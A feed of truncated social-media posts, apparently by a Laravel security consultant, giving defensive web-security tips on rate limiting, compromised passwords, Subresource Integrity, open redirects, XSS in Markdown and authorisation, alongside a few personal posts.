Article 0
Does your login form rate limit requests, or does it let an attacker make as many as they want? 🔓You need rate limiting to slow down and hinder brute-force and credential stuffing...
View ArticleArticle 1
Should You Block Compromised Passwords?Blocking pwned passwords @haveibeenpwned is great, but you can't simply drop in `->uncompromised()` and call it a day when you have non-technical users....
View ArticleArticle 0
The long awaited Missing Authorisation module for Practical Laravel Security is now LIVE! 🎉This module covers IDORs, broken crypto, exposed routes, and related records, and includes 6 challenges to...
View ArticleArticle 2
How much do you trust the 3rd-party scripts included on your site? Would you know if they changed and a malicious script was added?Subresource Integrity solves this problem by defining a safe version...
View ArticleArticle 1
#Substack popped up a NPS score feedback box for "bestsellers" (>100 paid subs), and I may have written a small essay on why I'm leaving soon and why blocking Nazis would be cheaper than their...
View ArticleArticle 0
How secure is your staging site? Staging is often buggy, full of vulnerabilities, and debugging tools, and an easy gateway into your production environment. Make sure you protect it![$]...
View ArticleArticle 0
Ⓣⓡⓐⓝⓢⓛⓘⓣⓔⓡⓐⓣⓘⓞⓝ is a sneaky trick that can be used to bypass rate limiting, blocklists, existence checks, and more, by taking advantage of your database's "helpful"...
View ArticleArticle 1
One of the cool things about doing security audits are interactions like these.I found a sneaky and obscure edge case in a really cool security feature my client built to solve a massive security risk...
View ArticleArticle 0
While it may be tempting to use a query parameter to trigger a redirect after a form submission, or even via a GET, you're most likely leaving an Open Redirect, just waiting for someone to exploit...
View ArticleArticle 0
This is your periodic reminder that you shouldn't hardcode admin accounts in your code! ⚠️You'll end up forgetting to update the list when an admin leaves (or is fired), and someone with malicious...
View ArticleArticle 0
This is your periodic reminder to keep your dependencies updated. `composer outdated` and `composer audit` are your friends!...
View ArticleArticle 3
Anyone else having issues uploading images to phpc.social in the PWA on Android? The image uploads and then errors out with:"500 Error processing thumbnail for uploaded media"@ramsey@phpc
View ArticleArticle 2
My wife found this for me at the library... Not quite sure what message she's trying to give me... 🤔
View ArticleArticle 1
Is your API or SPA leaking sensitive data? Check what data your app sends to the browser or returns in an API. You may be surprised just how much you're accidently sharing... (Hint: Usually more than...
View ArticleArticle 0
Open your IDE and do a search for "md5(" and "rand(". There is a very good chance you'll have either (or both) hiding somewhere, serving some purpose that's supposed to be secure, but really isn't!...
View ArticleArticle 1
When you reach for helpers, particularly the Auth helpers, make sure you understand the side-effects...Spoiler: Don't use `Auth::loginUsingId()` on a single guest...
View ArticleArticle 0
Loving this small visual tweak to Practical Laravel Security before I dive into writing out the Missing Authorisation defence modules. 😁Still need to break the challenges into their own pages, but this...
View ArticleArticle 0
It's been a while since I've seen an accidental emails-from-staging broadcast, and let's keep it that way: Make sure your staging envs don't sent out live emails!...
View ArticleArticle 1
When you're validating your user input, don't forget about the HTML from WYSIWIG and markup editors, and good old Markdown... It's easy to sneak XSS into those if you're not validating or filtering...
View ArticleArticle 0
If you're using parent-child model route bindings, check out `scopeBindings()`! It'll ensure any child models are loaded from the parent scope, preventing sneaky authorisation bypassing through...
View Article